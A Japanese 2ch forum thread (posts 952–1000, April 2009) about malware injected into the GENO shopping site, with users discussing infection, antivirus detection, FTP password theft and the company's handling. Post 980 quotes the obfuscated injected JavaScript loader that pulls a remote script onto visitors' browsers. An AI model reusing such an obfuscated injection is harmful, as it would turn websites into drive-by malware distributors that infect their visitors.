GENOなどのサイトでウイルス感染★8

このエントリーをはてなブックマークに追加
952 ムラサキケマン(福岡県):2009/04/08(水) 03:39:48.14 ID:npJH2Bwd
お詫びセールマダァ-? (・∀・ )っ/凵⌒☆チンチン
953 キクバクワガタ(東京都):2009/04/08(水) 03:40:31.36 ID:7gY3HCpw
この騒動のせいで、張られたURL全然踏めなくなった。。
いつになったら解決すんだよ。。その割なんかIT系サイトでも扱い小さいし。。
954 サポナリア(catv?):2009/04/08(水) 03:41:36.77 ID:o8yihpl5
/news/?id=10からさっき落とした奴
http://www.virscan.org/report/97b45eb2a7d4643be5afc016cd6a0db0.html
955 クモイコザクラ(dion軍):2009/04/08(水) 03:43:10.21 ID:9R1FADc0
ぐぐってたらこのフォーラムくわしいっぽい
どうせ英語だしこわいやつはふむなよ
http://www.windowsbbs.com/malware-virus-removal/82784-js-script-juliet.html

More than likely a trojan on the local comp has stolen
ftp username & password & that's how the sites get infected.

FTPパスワードぬすんでそうなのがいくつかのサイトに書いてあった

日本語のまとめこのへん
http://www3.atword.jp/gnome/2009/04/06/zlkon-virus-spread-over-japanease-e-commerce-site/

Noscriptで見に行ったけど怖い人はふまないでね
956 クモイコザクラ(dion軍):2009/04/08(水) 03:43:50.74 ID:9R1FADc0
リロードしてなかった
もろかぶりすまん><
957 コブシ(千葉県):2009/04/08(水) 03:44:18.97 ID:/Euywwyx
あ、てか、Geno鯖のIPであった漏れ串疑惑の件はどうなったんだろ?

少なくても2ch側では焼かれているから2ch書き込み用には使えない筈だけど。
逆に未だに漏れ串として使えちゃうのなら未だに穴あきまくりって事に他ならないけど。

だれかポートスキャンなり、チェックした奴いる?
958 コブシ(千葉県):2009/04/08(水) 03:46:02.63 ID:/Euywwyx
>>956
どどんまい♪
959 アグロステンマ アゲラタム(東京都):2009/04/08(水) 03:47:27.74 ID:6aPfNErr
>>934
これが企業としての本来の対応だよね

GENOは見習うべき
無理だろうけど
960 ノボロギク(長崎県):2009/04/08(水) 03:51:14.85 ID:idbp3JFq
>>773
もう駄目かもしれんね
961 サポナリア(東京都):2009/04/08(水) 03:51:15.70 ID:ubT4k3U6
>>951
ということはマスコミの記事(impress)がうそだったんですね。
そっちに抗議送ります とかメールしてみてはどうだろう。
962 クワガタソウ(東海):2009/04/08(水) 03:57:12.63 ID:AkP+BPY7
海外では少し前から改ざん被害があったのにアンチウィルスが
対応してなかったのはマルウェアばらまき開始までにタイムラグがあったのかな

寝る前にふと思った。おやすみなさい。
963 ノボロギク(長崎県):2009/04/08(水) 04:00:22.90 ID:idbp3JFq
>>779
(*´3`) ブチュ
964 エニシダ(東京都):2009/04/08(水) 04:06:25.23 ID:3JqNvMmq
なんでケーブル抜いて電源落とさないんだ?気がついてないってこと?
改ざんされた現在も普通に発注入ってるのかな?
965 ジンチョウゲ(dion軍):2009/04/08(水) 04:08:52.71 ID:WcsaUurT
>>964
気がついてる
が、売り上げを落としたくないから放置
966 ダリア(兵庫県):2009/04/08(水) 04:13:40.24 ID:02q+5VKI
>>954
これじゃどれが検知できるウイルス対策ソフトかいえないよなあ・・・。
やっぱりパッカーで何種類かあるのか?
967 エニシダ(東京都):2009/04/08(水) 04:13:52.80 ID:3JqNvMmq
>>965
ひでえなwww
968 サンシュ(岩手県):2009/04/08(水) 04:26:00.41 ID:hmA3R7nr
これを機会にAVGからavastにしてみた。
使いづらいけど、すぐに慣れると思う。
969 雪割草ユキワリソウ(catv?):2009/04/08(水) 05:49:00.68 ID:DyW0atug
ようやくAVIRAで検出出来るようになったけど、
駆除までは出来ないね。
というかまだどこも駆除までは出来て居ない感じだけど。
亜種も出てきそうだし、踏んだら死を待つかOS再インストールの脅威はまだ残っているのか・・・。
970 プリムラ・ラウレンチアナ(アラバマ州):2009/04/08(水) 05:52:07.63 ID:/KHDMM3M
おまいらおはよう
踏まずにスレ1からにニヤニヤしてみてたけどリアルで病気になった(´Д`)
971 ウバメガシ(福岡県):2009/04/08(水) 05:56:32.17 ID:uLqswnm6
中国フランスアメリカのフォーラムによると
FTPを使うとIDとパスを感染元に送る可能性があると書かれてるね
抜かれたら改竄されて、改竄サイトを見た人が2次感染という仕組みか
対策としてはOS再インスコがあげられてたは…

ということは
972 サポナリア(アラバマ州):2009/04/08(水) 05:58:23.46 ID:L/x/fwTd
なんのIDとパスよ
973 エピデントルム(アラバマ州):2009/04/08(水) 06:02:24.66 ID:12tw4+YB
二次感染した方の被害は?
まだラトビアに何か送信してるって事しか分からないのか
974 トウゴクミツバツツジ(福岡県):2009/04/08(水) 06:05:48.60 ID:2Lc8/c3J
>>972
ftpパスワード
975 プリムラ(catv?):2009/04/08(水) 06:08:52.47 ID:99EypeXF
どうしたおまいら!?勢いが急速に衰えてるぞ!
新学期がはじまったからか?そんなにニュー速って学生多いのか!?
976 カエノリヌム・オリガニフォリウム(静岡県):2009/04/08(水) 06:11:35.21 ID:tEXtqOev
2ちゃん見てる奴なんて学生くらいだろ
977 パンジー(コネチカット州):2009/04/08(水) 06:18:58.42 ID:BWWgypYC
CMSでサイト管理しててもやばいって事?
978 ジョウシュウアズマギク(大阪府):2009/04/08(水) 06:22:15.84 ID:6D9iz6jy
今知った。サイトにあるようにキヤッシュ消した。
カスペルしたら感染してる・・・
履歴を消したら、Geno経由で感染した証拠もなくなるじゃないか。

まじで酷くないか?
979 トベラ(catv?):2009/04/08(水) 06:23:09.78 ID:QPknj9je
プロバイダにアクセス履歴が残ってるはず
980 トウゴクミツバツツジ(福岡県):2009/04/08(水) 06:23:22.23 ID:2Lc8/c3J
>>955にもあるけど

>694 名前: フリージア(東京都)[sage] 投稿日:2009/04/07(火) 08:09:42.90 ID:aQV3b+FB
>Genoの.jsなんだが
><!--
>document.write(unescape('%3CsoQcripB9tmO%20smOrc%3DB9%2F%2F94tNt%2EtNt2fq4YMj7tNt%2Ew22YMj%2E19N65rz0%2FjqueryB9%2EmOjoQs%3EBn%3C%2FsmOctNtriN6ptNttYMj%3E').replace(/w2|oQ|YMj|fq|rz0|B9|tNt|N6|Bn|mO/g,""));
>-->
>なんだよこれ、ウィルス復旧してんじゃねぇかw
>ファイルを元に戻しただけで、そもそもの外部からの侵入口は開いたままだったのかwww

最初の鯖復旧から別のコードになってってことは
とりあえずgenoがftpハックされっぱだったのは確実じゃね
981 オオタチツボスミレ(東京都):2009/04/08(水) 06:23:57.00 ID:yEDOditL
で、GENOはもうウィスル排除できたの?
982 ツメクサ(愛知県):2009/04/08(水) 06:27:04.40 ID:0uOJ/yxE
ゲノ自体がウィルスのように見えてきました^^;
983 プリムラ(catv?):2009/04/08(水) 06:34:58.92 ID:99EypeXF
>>976
(´・ω・`)
984 シンビジューム(北海道):2009/04/08(水) 06:37:35.78 ID:7qCJecVG
お聞きしたいのですがフォーマットしないで
リカバリ領域からのリカバリじゃ意味ないんでしょうか?
985 ツメクサ(愛知県):2009/04/08(水) 06:40:59.34 ID:0uOJ/yxE
はよ、次スレたてておくれ('A`)
986 モリシマアカシア(東京都):2009/04/08(水) 06:44:09.00 ID:z5F55YOs
前にFC2なんかの個人ブログがやられまくった時の個人の対応より酷すぎるだろw
放置垢以外は消すなり、ロックかけたりしてたしなー
987 ジョウシュウアズマギク(大阪府):2009/04/08(水) 06:45:07.23 ID:6D9iz6jy
たってるよ。
http://tsushima.2ch.net/test/read.html/news/1239126066/l100
988 菜の花(catv?):2009/04/08(水) 06:50:33.91 ID:dbZ3xWwK
お前らがいるから2chを安全に楽しめる
989 パンジー(コネチカット州):2009/04/08(水) 07:00:22.44 ID:BWWgypYC
システムの復元してウイルスチェックもしたけど不安が消えねー
フォーマットは絶対したくねえ
胃が痛い
990 プリムラ・マラコイデス(catv?):2009/04/08(水) 07:16:42.84 ID:sWTg/iKG
今履歴調べたら4/3の18時にアクセスしてたギリギリセーフか
991 モッコウバラ(石川県):2009/04/08(水) 07:17:32.77 ID:b1Lp+f0/
GENOサイド
992 カンガルーポー(長屋):2009/04/08(水) 07:18:04.56 ID:+ZMMsMb1
>>990
でも審判にはアウトと言われ、ブラウン監督と共に退場
993 ミツバツツジ(北海道):2009/04/08(水) 07:26:08.88 ID:X1ulH0vi
今起床した。GENOの対応ワロスww
994 サンシュ(大阪府):2009/04/08(水) 07:27:18.68 ID:IWkRDcir
http://tsushima.2ch.net/test/read.cgi/news/1239126066/

次ここ?
995 ジョウシュウアズマギク(大阪府):2009/04/08(水) 07:38:42.99 ID:6D9iz6jy
958 :[Fn]+[名無しさん]:2009/04/05(日) 01:46:48 ID:kDmqdJ/4
    昨日の10時頃からみたいだけど?
959 :[Fn]+[名無しさん]:2009/04/05(日) 01:56:25 ID:DhrYIPH5
    確実感染なのはそうみたいだね。ウイルスは本物の新種みたいだ。
    2日付で発見された新種の亜種だとか。それはソフトは無力になるなー。
    なぜGENOみたいなマイナーサイト狙ったんだろ。もっと大手なら大変なことに
996 モッコウバラ(石川県):2009/04/08(水) 07:47:01.04 ID:b1Lp+f0/
>>1000ならGENOが神対応
997 プリムラ・マラコイデス(東京都):2009/04/08(水) 07:47:34.24 ID:U8LtmWqj
普通に営業再開しててワロタ
998 トベラ(catv?):2009/04/08(水) 07:59:01.69 ID:QPknj9je
u
999 フモトスミレ(アラバマ州):2009/04/08(水) 07:59:19.41 ID:fCqxdq4Y
1000ならGENO破産
1000 ユキヤナギ(dion軍):2009/04/08(水) 07:59:53.56 ID:zfODl1gP
1000ならGENO倒産
10011001
このスレッドは1000を超えました。
もう書けないので、新しい職を探して下さい。。。

                            ニュース速報
              http://www.hellowork.go.jp/